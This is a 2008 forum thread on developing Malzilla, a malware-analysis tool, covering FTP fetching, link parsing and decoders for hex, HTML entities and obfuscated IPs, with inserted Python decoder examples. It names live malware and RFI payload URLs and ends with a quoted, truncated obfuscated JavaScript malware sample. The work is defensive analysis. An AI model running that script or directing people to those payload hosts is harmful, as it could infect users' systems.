Post by: MysteryFCM on June 18, 2008, 07:08:48 am
hehe
Title: Re: MalZilla
Post by: sowhat-x on June 18, 2008, 08:15:27 am
Winsock 2 functions for Delphi... Jedi provides that,
but my guess is that this info is not really something new/helpful to bobby...  :-\
http://jedi-apilib.sourceforge.net/
Here's also an alternative Winsock2 Delphi unit implementation,
coded by Aphex, lol... semi-'hackish' source  :)
Title: Re: MalZilla
Post by: Orac on June 18, 2008, 12:17:22 pm
Thanks Bobby

All I want to be able to do is get a file from FTP port 21 using Malzilla, more RFIs are now using FTP:// in place of HTTP://

For example here's an active one from last week's logs,  ftp://193.253.223.43/tmp/trem/oldbisok

A fully featured FTP client isn't required, neither is the ability to sign in to the FTP port, I just want to grab the file and run. I am currently using Lynx to do this, if that fails I've had success using a plain vanilla copy of Firefox. I've never tried with IE, grabbing live malware with IE doesn't appeal lol
Title: Re: MalZilla
Post by: bobby on June 18, 2008, 05:46:59 pm
This is a lot of posts to answer :)

@Orac
I'll try to make a simple FTP handling this weekend.

@sowhat-x
Malzilla uses Synapse for HTTP, and I'll use it for FTP too.
There is a TraceRoute example in Synapse package, but it does not work always. It works well on trying traceroute to Yahoo, but never works for Google.

Here is the main problem - I think I have a solution to get the IP of a website, but I want to do it in one single step with the HTTP "GET" (opening a website).
If anyone can recall, Malzilla got the most attention exactly because it accessed MPack sites in one single step. If you use a downloader that does "HEAD" before "GET", it gets banned from MPack (and other *pack sites).
Now, I'm not sure if asking a DNS server for the IP in one step, and doing it again in the HTTP "GET", would produce some false results. I guess it can if the DNS server is malicious, or resolves to another IP every time you ask for a website.
See, I must find a way to do it in one single step, either by hacking Synapse to get the results right from the HTTP "GET" command, or asking on the Synapse mailing list if this is already implemented (I couldn't find it last night in the API), or as a last solution - rewrite Malzilla (not to use Synapse anymore, but to do low-level Winsock calls).
I would not like to go away from Synapse. It would be a loooooooot of work to do.

So, thank you all for searching for a solution, but I need to get a solution for doing this by using Synapse, and to do it in one single DNS server access, which means I need to read the resolved IP address from Synapse at the step where Synapse is resolving the host in order to do the HTTP GET.
Title: Re: MalZilla
Post by: sowhat-x on June 18, 2008, 06:02:39 pm
...seems that we got distracted with ideas related either to the 'easiness' of daily use,
and/or the implementations of socket-related functions, thereby...
we completely ignored the actual malware-related implications that are involved...  :(
=================

P.S: ...not relevant to Malzilla itself... since the DNS resolving thing got raised earlier,
I got interested today in searching around cross-platform sources for doing this...
Stumbled upon this one as well... if it's of interest to anyone:
http://aluigi.altervista.org/mytoolz/hostsdns.zip
Title: Re: MalZilla
Post by: bobby on June 18, 2008, 08:27:51 pm
@Orac
Basic FTP is implemented.
I need to fix some minor glitches before I upload a new build.
Title: Re: MalZilla
Post by: Orac on June 19, 2008, 10:38:15 am
Many thanks Bobby :)
Title: Re: MalZilla
Post by: bobby on June 19, 2008, 10:34:11 pm
Orac, can you test this version (attached)?

If you have a file to download from FTP, use GET button (just like for HTTP).
If you want to see a content of a folder on FTP, use CTRL + GET button (URL must be a folder).

If you need to login to the server, use the standard URL scheme:
ftp://user:password@server.com(:port)/folder/file.txt

If the user and pass are not supplied, the following will be used (you must provide login data even for Anonymous access):
user: Anonymous
pass: aa@aa.aa
In the future I'll make this to be set up by the user (settings for anonymous user name and pass). As for now it is hardcoded.

Clipboard Monitor still does not have FTP protocol implemented.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 09:26:00 am
Bobby, I've downloaded (twice) but it won't open, all I am getting is
Quote
malzilla.exe is not a valid Win32 application
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:36:43 am
Works fine here when I download it from my previous post.
Would you like that I upload it somewhere else for you?
Maybe you have connection problems at downloading from MDL.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 10:16:25 am
I tried a cold reboot of the whole system, downloaded it again but it wouldn't open for the same reason :(

Then tried a few other tricks, such as running it in Windows 95 compatibility mode, no change.

Checked the downloaded file, it's 0 bytes !!

I've not had a problem downloading from MDL before but may be worth trying another location. Like MysteryFCM I've had problems in the past using RS and I know others in the UK that have too, I think it's something with our ISPs. But never had this kind of problem either here or from any of the other forums we all know and use.

If no one else reports the same problem, then it has to be my end.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 10:50:48 am
On a more positive note, just had the chance to use HTTPS for the first time, it worked great :)
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:52:23 am
Try to grab the files from here:
http://malzilla.sourceforge.net/builds/
Grab just the Malzilla.exe if you already have the DLL files from your previous downloads.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:58:57 am
Quote from: Orac
On a more positive note, just had the chance to use HTTPS for the first time, it worked great :)

Here is how and where I test Malzilla:

Test of GZiped transfer - http://carsten.codimi.de/gzip.yaws/
Test of sent HTTP headers - http://c2.com/cgi/test/
Test of HTTPS - www.gmail.com - follow the first redirection

I still need to find where I can test FTP functionality. As for now, I'm doing it by testing the communication with FTP server of MyCity forum. I would like to find some test server, like the C2 test for HTTP headers.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 11:47:55 am
That download worked.

Just tested it on some live FTP malware links, and it works perfectly :)

Thanks Bobby, that's a great job you've done, next time you're in the UK I owe you a few beers. Afraid I can't help with suitable test sites, the only links I've got are either live malware, or they have been cleaned up.
Title: Re: MalZilla
Post by: tjs on June 20, 2008, 08:53:43 pm
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:

* when using a link with hxxp, the tab name is named hxxp: instead of domain name
   example:
   hxxp://test.com (tab title: hxxp:)
   http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them

Thanks,
TJS
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 08:58:51 pm
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:13:03 pm
Quote from: tjs
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:

* when using a link with hxxp, the tab name is named hxxp: instead of domain name
   example:
   hxxp://test.com (tab title: hxxp:)
   http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them

Thanks,
TJS
Hi TJS,
- hxxp thing - fixed (fxp is translated to ftp too). I fixed this once, but it seems that it is gone after I reverted some changes (anyone recall my trying to make a splash screen?)
- spaces in about box fixed
- these are just test builds, neither the update info on the server nor the version info in Malzilla is set up. These are just test builds for us here. I'll set the right values for the formal release on SourceForge

Thanks for testing and reporting :)


Quote
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,

I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:31:18 pm
Please download fixed build from http://malzilla.sourceforge.net/builds/
I have fixed the bugs reported by TJS.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:32:46 pm
Quote
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,

I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.

That should be fine, thank you.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:38:11 pm
If I try to retrieve this directory with Malzilla using CTRL + GET

ftp://193.253.223.43/tmp/trem/

I see

Quote
06-19-08  10:50PM                  681 1
06-19-08  10:50PM                20673 2
06-19-08  10:50PM                 1244 old
06-19-08  10:50PM                 1929 oldbisok

But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spécifié est introuvable. "

But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:45:26 pm
Quote
If I try to retrieve this directory with Malzilla using CTRL + GET

ftp://193.253.223.43/tmp/trem/

I see

Quote
06-19-08  10:50PM                  681 1
06-19-08  10:50PM                20673 2
06-19-08  10:50PM                 1244 old
06-19-08  10:50PM                 1929 oldbisok

But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spécifié est introuvable. "

But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
I know that one, I tried it while testing Malzilla's FTP capabilities. I got the same results.
After that I wanted to be sure, and tried it from Firefox, and I got exactly the same error as in Malzilla.
Which FTP client did you use to download the file successfully?
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:48:54 pm
FlashFXP. It sends RETR oldbisok
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:53:56 pm
Hmmm... I just got the file by using Total Commander's integrated FTP client.
So, there is something with settings, as Malzilla and Firefox do not get it, but normal FTP clients do.

There is one basic difference between an ordinary FTP client and Malzilla.
FTP client logs in on the servers, and does not log out until you say so.
Malzilla logs in and out for every click on GET button.

I'll take a look now at connection parameters, to see if it has something to do with PASSIVE settings.
Some servers need that mode for transferring binary files.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:58:58 pm
Sometimes a server will need PASV mode enabled/disabled to do stuff; in this case I just checked and it works either way. After logging in it also sends "TYPE I", if that helps you.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:34:00 pm
I saw where the trick is  ;D
The file on the server has a malformed name - it contains a space at the end.
Malzilla trims the spaces at the beginning and end of the URL by default. This way I prevent mistakes made by bad copy/paste of links from text files or websites.
It seems that FireFox does it too.

What to do now?
To trim spaces or not to trim?
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 11:19:07 pm
OK, get the new EXE from http://malzilla.sourceforge.net/builds/
Hold SHIFT at clicking on GET button, and the whitespaces will not be trimmed out.

To summarize the functions of GET button:

HTTP URLs:
- SHIFT = no trim

FTP URLs:
- SHIFT = no trim
- CTRL = LIST (works only if URL points to a folder)
- SHIFT + CTRL = no trim + LIST

btw. if you get LIST results and try to select (with the cursor) behind the oldbisok file, you will see that you have just one whitespace behind the filename.

FTP unit in Malzilla is now changed a lot (PASV + TYPE I + different parsing of filename and path from URL). Please report if something got broken that downloaded successfully with previous build (worked before changes, now does not work).
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 11:50:33 am
Downloaded the update yesterday, all seems to be working as intended.

Just used the FTP (on the three RFI links I posted earlier today) and it works perfectly.

Haven't got any new HTTPS links to test (yet), will report back on this aspect when I get one  ;)
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 05:54:46 pm
Possible bug

This link http://baptiste-bugnon.ch/help/ix.dat is a copy of Defacing Tool; the link to "//The Rules" wasn't passed to the Links parser, neither was the link "<!-- saved from url=" at the top of the script.

Title: Re: MalZilla
Post by: bobby on June 22, 2008, 07:52:08 pm
No, it is not a bug, it is a feature :)
Malzilla does just what every webspider does - follow the HREF links.
It does not search for every link in the file. Links from textual part of file, links from comments and the links from scripts are not on the list in Link Parser.

I will now explain why this is done this way.
I DO have code that will catch every single URL, even from binary files, but this is far from perfect for HTML files.
Namely, most of the links in HTML files are relative paths (e.g. "/images/image.gif").
Those would be missed by the other code that I have.
The current code in Malzilla searches for every HREF and checks whether it is a relative or absolute path. If it is relative, it searches for a Base tag (not necessarily present in every HTML document). If Base is found, then the absolute paths are calculated relative to this basis. If the Base tag is not present, the current URL (from the URL box on the Download tab) is taken as the basis for the calculation. See the Link Parser tab, "URI base" field. If it says "URI base (detected)", it means that the HTML contains a Base tag. If it says "URI base (not detected)", it means that the URL from Download tab > URL box is used for the calculation.

As an example, save any HTML page that does not contain a Base tag in the HTML header, and where some relative URLs exist in the document.
Now open a new Download tab and load this document. Take a look at LinkParser - you will not have complete URLs anymore because Malzilla does not know the base URL.
A solution is to save pages as 'Malzilla projects' (see Settings tab). This way extra info is added to every saved HTML page (it does not destroy the page as the info is added in the form of comments). When loading such HTML in Malzilla next time, Malzilla will know the base URL, UserAgent and referrer used.

Now, I can add an extra list in LinkParser that will contain all the links detected by a regular expression. That will catch every ABSOLUTE URL (relative URLs can't be found with such a function), no matter if the URL is in a comment or anywhere else in the document.

More info on Base tag:
http://www.w3schools.com/TAGS/tag_base.asp
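An added example (not Malzilla's code) of the two approaches bobby contrasts: walking HREFs and resolving them against the Base tag or the fetched URL, versus a plain regex sweep that finds only absolute URLs, wherever they sit (comments and scripts included). The sample page and all host names in it are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Absolute URLs only; a relative path like "/images/image.gif" cannot be matched this way.
ABS_URL = re.compile(r"""\b(?:https?|ftp)://[^\s"'<>]+""")


class HrefCollector(HTMLParser):
    """Collect every HREF attribute and the first <base href>, like a web spider would."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href") and self.base is None:
            self.base = a["href"]
        elif a.get("href"):
            self.hrefs.append(a["href"])


def parse_links(html_text, page_url=None):
    """Return (uri_base, base_detected, resolved_hrefs, absolute_urls_anywhere).

    uri_base is the <base href> when the document has one ("URI base (detected)"),
    otherwise page_url, the URL the page was fetched from ("not detected").
    With neither, relative HREFs stay incomplete, as with a saved page reloaded
    without its origin URL.
    """
    collector = HrefCollector()
    collector.feed(html_text)
    detected = collector.base is not None
    base = collector.base if detected else page_url
    resolved = [urljoin(base, h) if base else h for h in collector.hrefs]
    return base, detected, resolved, ABS_URL.findall(html_text)


# Constructed sample page: a <base> tag, relative and absolute HREFs, plus URLs that
# live only in a comment and a script (exactly what the HREF walk skips).
SAMPLE_HTML = """<!-- saved from url=(0022)http://origin.example/ -->
<html><head><base href="http://base.example/dir/"></head><body>
<a href="/images/image.gif">img</a> <a href="page2.html">next</a>
<a href="http://abs.example/x">abs</a>
<script>var rules = "http://hidden.example/rules.txt";</script>
</body></html>"""

if __name__ == "__main__":
    base, detected, hrefs, everything = parse_links(SAMPLE_HTML)
    print("URI base (%s): %s" % ("detected" if detected else "not detected", base))
    print("HREF links:", hrefs)
    print("Absolute URLs anywhere:", everything)
```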
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 09:55:31 pm
Thanks for the explanation Bobby, I am surprised I hadn't noticed it before.

I can only assume this must have been the first time we've seen this particular exploit where the rules file hasn't been a HREF link, and as such the skiddie has in fact borked the script, which is meant to load that file as an add-on to the script's defacing abilities.

The particular link in this script has in fact been 404 for a couple of years now, which always gives me a laugh; you would have thought they would check its availability before attempting to use the script for a RFI lol.



Title: Re: MalZilla
Post by: sowhat-x on June 28, 2008, 12:01:44 pm
Small glitch I've noticed in the latest beta, not really important though...

1)Get the latest 'officially' released zip from sourceforge (0.9.3pre5) and extract it...
2)Extract latest devel/test build of malzilla.exe (overwriting the older one),
run it,then simply press the "Mini Html View" button...
"Cannot create file "C:\path-to-malzilla-dir\Cache\tempview".The system cannot find blah-blah..."

Maybe it should automatically create the "Cache" folder upon startup or something...

Title: Re: MalZilla
Post by: bobby on June 28, 2008, 01:37:16 pm
Indeed, Cache folder is created when you do the first download.
I'll correct this bug.

Thanks ;)
Title: Re: MalZilla
Post by: tjs on July 15, 2008, 09:46:23 pm
ISC is reporting on some new javascript trickery:
http://isc.sans.org/diary.html?storyid=4724

Thanks,
TJS
Title: Re: MalZilla
Post by: tjs on July 16, 2008, 06:24:27 pm
Bug & Suggestions:

I think there's a bug in the latest beta build involving the Hex (%) decoder. The bug doesn't exist in older variants, and I was able to repro the issue on several machines.

Issue: hex encoded strings are not decoded properly.
Example: <script src=http://%7A%73%68%61%63%6B%2E%63%6E> decodes to:
<script src=http:?zshack.c6E>

This is incorrect. %7A%73%68%61%63%6B%2E%63%6E should resolve as zshack.cn.

---

Next, some suggestions for the decoder section -- I've started seeing some malware sites using various IP encoding schemes to obfuscate their payload addresses. They are simple to reverse, but it would be nice to have one built into Malzilla. Here are some examples:

hex IP encoding
Octal IP encoding
DWord IP encoding
Hybrid encoding (have fun!)

Here are some examples:

http://207.46.197.32
---------------------
http://0xCF.0x2E.0xC5.0x20
http://0317.056.0305.040
http://00317.0056.00305.0040
http://3475948832
http://7770916128
http://12065883424
http://16360850720
http://0xCF2EC520

I can help you with the calculations if you aren't familiar with this stuff...

Great resource: http://www.searchlores.org/obscure.htm (not malware)


Thanks!!
TJS
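An added example (not Malzilla's IP converter) that normalises every spelling TJS lists, hybrids included, back to dotted decimal using the inet_aton rules browsers apply to numeric hosts: 0x means hex, a leading 0 means octal, and the last token fills whatever bytes remain. The modulo-2^32 wrap for a lone dword is an assumption taken from TJS's 7770916128 / 12065883424 / 16360850720 examples.

```python
from urllib.parse import urlsplit


def _parse_part(tok):
    """One dot-separated token: 0x.. is hex, a leading 0 means octal, else decimal."""
    if not tok or tok != tok.strip() or "_" in tok:
        raise ValueError(tok)          # int() alone is too permissive about these
    if tok[:2].lower() == "0x":
        return int(tok[2:], 16)
    if len(tok) > 1 and tok[0] == "0":
        return int(tok, 8)
    return int(tok, 10)


def deobfuscate_ipv4(host):
    """Return dotted decimal for a 1- to 4-part numeric host, or None if it is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    if any(v < 0 for v in vals) or any(v > 255 for v in vals[:-1]):
        return None
    last_width = 5 - len(parts)        # bytes the last token has to fill
    last = vals[-1]
    if len(parts) == 1:
        # Assumption: a lone dword wraps modulo 2**32, which is how TJS's
        # 7770916128 / 12065883424 / 16360850720 map back to 207.46.197.32.
        last %= 1 << 32
    elif last >= 1 << (8 * last_width):
        return None
    n = 0
    for v in vals[:-1]:
        n = (n << 8) | v
    n = (n << (8 * last_width)) | last
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def deobfuscate_url_host(url):
    """Hypothetical helper: pull the host out of a URL and normalise it."""
    host = urlsplit(url).hostname
    return deobfuscate_ipv4(host) if host else None


if __name__ == "__main__":
    for u in ("http://0xCF.0x2E.0xC5.0x20", "http://0317.056.0305.040",
              "http://3475948832", "http://7770916128", "http://0xCF2EC520"):
        print(u, "->", deobfuscate_url_host(u))
```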
Title: Re: MalZilla
Post by: bobby on July 16, 2008, 06:48:41 pm
Thanks for reporting the bug. It is indeed a BUG.
If you use Decode hex button - you see the bug.
If you use right-click menu > Run script (internal) > decode hex - it works like it should.
I'll take a look what I did wrong.

I'll also take a look at that IP encoding. Thanks for mentioning this, I had forgotten about such IP encoding. I saw that kind of obfuscation only once, a couple of years ago, and I forgot about it.
Title: Re: MalZilla
Post by: tjs on July 16, 2008, 08:11:30 pm
My pleasure, friend. :)
Title: Re: MalZilla
Post by: bobby on August 10, 2008, 07:28:06 pm
After a lot of time...
http://malzilla.sourceforge.net/builds/

Please download updated files from this folder (you do not need to download the DLL files if you already have them, these are not updated).

Changelog:

Bugfixes:
- Misc Decoders rewrite
- Cookies tab (in Download tab) fixed. It does not mix cookies from various tabs anymore
- Hex view (in Download tab) fixed. Does not show wrong data (from wrong tab) anymore
- improvements in Mini HTML view
- others that I have already forgotten

Additions:
- new tool on Tools tab - IP converter (see TJS' post)
- decoder Templates

Decoder Templates are code snippets to be added to the script before decoding. Some of the variables from the snippets will be automatically replaced with values from Malzilla. See the Docs folder, there is a list of variables that will be replaced in templates with values from Malzilla (e.g. malzilla.location.href will be replaced with the content of the URL field on the Download tab).
This should help a bit at deobfuscating scripts that are using non-trivial DOM objects.
More templates to come.
All the templates need to be in Templates folder if you want them to appear on the list of templates.


So, if everything goes fine, this will be Malzilla 1.0

Things that are not implemented (and probably will not be implemented because of complexity):
- downloading from FTP on Clipboard Monitor tab
- multi-language interface (we have started this once, but it takes a lot of time that I do not have)
Title: Re: MalZilla
Post by: MysteryFCM on August 11, 2008, 12:45:40 pm
Nice one dude :)
Title: Re: MalZilla
Post by: MysteryFCM on August 11, 2008, 02:03:36 pm
Bobby,
Malzilla doesn't seem to detect the iFrame SRCs for the links or iFrames tab for the following:

http://www.sanseng.com/eng/Product.asp

/edit

My bad, forgot to click to send to links parser hehe
Title: Re: MalZilla
Post by: tjs on August 12, 2008, 05:53:41 pm
The 'IP converter' tool is excellent!! I really like the UI. I'll do some deep testing later on and let you know what I find. :)

TJS
Title: Re: MalZilla
Post by: CM_MWR on August 15, 2008, 10:13:45 pm
Quote
Reply #178 on: August 12, 2008, 12:53:41 PM

Quote
I'll do some deep testing later on and let you know what I find.

Spec tjs got into some pretty deep shit,eh?  ;D
Title: Re: MalZilla
Post by: brewt on August 17, 2008, 09:12:59 am
hmm, is there an easy way to decode these unicode html entities?
Code: [Select]
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108
Title: Re: MalZilla
Post by: Orac on August 17, 2008, 09:33:48 am
Quote
hmm, is there an easy way to decode these unicode html entities?
Code: [Select]
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

Decoded
Code: [Select]
http://opana.cn/ya.htmlhttp://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here (http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html)
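An added example, not Malzilla's decoder code, covering both decoder questions in this thread: TJS's %XX hex string and brewt's semicolon-less `&#NNN` entities, plus JavaScript `\xHH` / `\uHHHH` escapes, run in rounds so nested encodings (entities hidden inside percent-encoding) unwind. The samples are taken from the posts above; the nested one is constructed.

```python
import html
import re
from urllib.parse import unquote

JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")


def decode_entities(s):
    """&#104 and &#x68 both become 'h'; html.unescape tolerates the missing ';'."""
    return html.unescape(s)


def decode_percent(s):
    """%7A -> 'z'; bytes that are not valid UTF-8 stay visible as U+FFFD."""
    return unquote(s, errors="replace")


def decode_js_escapes(s):
    """\\x7A and \\u007A -> 'z'."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_layers(s, max_rounds=8):
    """Run all three decoders until the text stops changing (or max_rounds)."""
    for _ in range(max_rounds):
        out = decode_js_escapes(decode_percent(decode_entities(s)))
        if out == s:
            break
        s = out
    return s


# Samples: the first two are from this thread, the third is a constructed nested case.
SAMPLES = {
    "percent": "<script src=http://%7A%73%68%61%63%6B%2E%63%6E>",
    "entities": "&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97"
                "&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108",
    "nested": "%26%23104%3B%26%23105%3B",   # percent-encoded entities -> "hi"
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, "->", decode_layers(text))
```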
Title: Re: MalZilla
Post by: bobby on August 17, 2008, 02:06:21 pm
In Malzilla, you can do that on Misc Decoders tab.

btw. hopefully, I will release Malzilla 1.0 today - it will have the most robust decoders ever (for unicode, hex, dec...)
Title: Re: MalZilla
Post by: bobby on August 17, 2008, 05:52:18 pm
Malzilla 1.0 released:
http://sourceforge.net/project/showfiles.php?group_id=203466
Title: Re: MalZilla
Post by: MysteryFCM on August 17, 2008, 08:50:29 pm
Nice one dude :)
Title: Re: MalZilla
Post by: Orac on August 18, 2008, 08:33:42 am
Thanks Bobby :)
Title: Re: MalZilla
Post by: tjs on August 19, 2008, 12:27:53 am
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.

Keep up the fantastic work, Bobby!
TJS
Title: Re: MalZilla
Post by: JohnC on September 01, 2008, 10:51:55 pm
The following code gives Access Violations in Malzilla.

Code: [Select]
var uaigei=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,44,21,55,40,22,1,53,39,38,0,0,0,0,0,0,20,42,0,37,3,54,15,4,36,11,12,59,10,32,58,9,19,16,25,26,28,51,48,24,7,49,56,0,0,0,0,0,0,5,8,52,14,17,2,27,18,43,47,13,41,45,30,31,29,50,57,33,35,6,23,62,61,60,34);var lszxla="osc5OV75aesD672vRks6uZHeur@eJeBhXs@eQkaPX4ceuZGPpY@@JpBPeYHaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYDJesDhJqvbm2fSYChLYH5SeeuhJqvbm2fJaaPTm2e@V75aOMDWZMGtyGvXl@vBRceO4E5Js@vJR5Bu2VeBb7bosc5O1aaXY2eaOYbpma@hmaaupMSgYGhpYHRIkGPL72BX6B2Ls@vLa@BJ6M@@kfQFaBfg6M@pma@hmaaupMSgYGhpYHRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc6AmaPb7aP9mcQJl@v6T@6I1Q6I1BB@lGhpl@Q6VGBhea2tBcP6MV5Bb2vg6C@geseXZuPpREhDYHhpaVfI@VeBQChb7Ch6aBPBba2@kfQFaBfg6M@pma@hmaaupMgJ7CRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc60Y@v9mcQJl@v6TGB@lGhpl@Q6VGBhea2t1aPpY75XaV5BbYb@kqvbm2fgY@5aeYeJr2f4m75b62BIQVfa1BQRmQ6IB@eI@VfpYcfa1VQJmQ6IV@eI@VfLscfa1BPLmQ6IW@eI@Vful7fa1QRsmQ6I4vTI@VfoYcfa1Qg9mQ6I1aPI@Vfu7cfa1Q5JmQ6IB@vI@VfL2cfBbYbFY7eL7aQup@f0R@Bb6M@tyahgCVPSRGabpMSgYGhpYHRIkGPL72BI48hgmMBgY@5aOXucOVfp6cedpVgIbV5JC2eqm6pf1BPN6C5IbV5JC2eql6pf1Be9mcff1aPR2HTpQ8BI4@vI@VfIBVbosc5O4ahResSgYGhpYHR6M@6I4vQIbV5JC2eqY6pf1QeXM55R2GQIbV5JC2eqx6pf1QvBRceIBMGtyahgCVeaeYeT2@ehJqPXsGeJeYfzmuGRGeGpVY6JaaPIbYbFpGhGYGaJxahaaVfFlCeX1uvIbV5JC2eqm6pf1QPrs@v6aVPSRc60Y@vNC7ff1aPR2HTnQ8BIBGhaxEff1aPR2HTeQ8BIcGPgaVuB@VPXsGeJ6VfBbYbpma@hp@e@4E5Js@vJR5Bb2VfH6HhgmMBgY@5aOXGcOVfux@vXGXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@4E5Js@vJR5Bb2VfHmMBgY@5aOXuWQ8BIQ5RgTQTHmMBgY@5aOXuRQ8BIcvormBBhT@eXW@5Jp@BI